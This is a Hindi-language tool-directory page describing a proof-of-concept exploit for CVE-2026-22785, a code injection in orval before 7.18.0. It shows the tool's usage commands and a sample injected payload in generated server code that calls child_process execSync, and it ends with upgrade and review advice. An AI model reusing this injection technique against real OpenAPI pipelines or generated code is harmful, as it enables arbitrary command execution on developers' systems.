Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22785 — CVE-2026-22785 के लिए शोषण उपकरण, orval < 7.18.0 में एक गंभीर कोड इंजेक्शन। भेद्यता प्रदर्शित करने और पेलोड इंजेक्शन सत्यापित करने के लिए शेल कमांड निष्पादन और फ़ाइल स्कैनिंग प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/langbyyi/cve-2026-22785
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षा
GitHublangbyyi/cve-2026-22785

CVE-2026-22785

CVE-2026-22785 के लिए शोषण उपकरण, orval < 7.18.0 में एक गंभीर कोड इंजेक्शन। भेद्यता प्रदर्शित करने और पेलोड इंजेक्शन सत्यापित करने के लिए शेल कमांड निष्पादन और फ़ाइल स्कैनिंग प्रदान करता है।

रिपॉजिटरी देखें
17 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-22785 प्रजनन ट्यूटोरियल

भेद्यता अवलोकन

  • CVE: CVE-2026-22785
  • प्रभाव: orval < 7.18.0
  • सुधार: orval >= 7.18.0
  • CVSS: 9.3 CRITICAL
  • प्रकार: कोड इंजेक्शन

भेद्यता सिद्धांत

orval < 7.18.0 MCP सर्वर कोड उत्पन्न करते समय OpenAPI विनिर्देश के summary फ़ील्ड को सीधे टेम्पलेट में जोड़ता है, बिना एस्केपिंग के, जिससे कोड इंजेक्शन होता है।

प्रजनन चरण

1. पर्यावरण तैयारी

root@kitploit:~
cd exploit
npm install

2. टूल का उपयोग

root@kitploit:~
# कमांड निष्पादित करें (भेद्यता शोषण)
python cve_tool.py shell <कमांड>

# उदाहरण
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir

# फ़ाइल स्कैन करें
python cve_tool.py scan <फ़ाइल>

3. आउटपुट विवरण

root@kitploit:~
<कमांड आउटपुट>
[+] CVE-2026-22785: Payload इंजेक्शन सफल
[+] इंजेक्शन स्थान: server.ts:31

भेद्यता साक्ष्य

server.ts जनरेटेड कोड:

root@kitploit:~
server.tool(
  'getApiDemo',
  'API.' + require('child_process').execSync('whoami', {}),//',
  getApiDemoHandler
);

सुरक्षा सुझाव

  1. orval को >= 7.18.0 में अपग्रेड करें
  2. OpenAPI विनिर्देश स्रोत को सत्यापित करें
  3. जनरेटेड कोड की समीक्षा करें
टूल डाउनलोड करें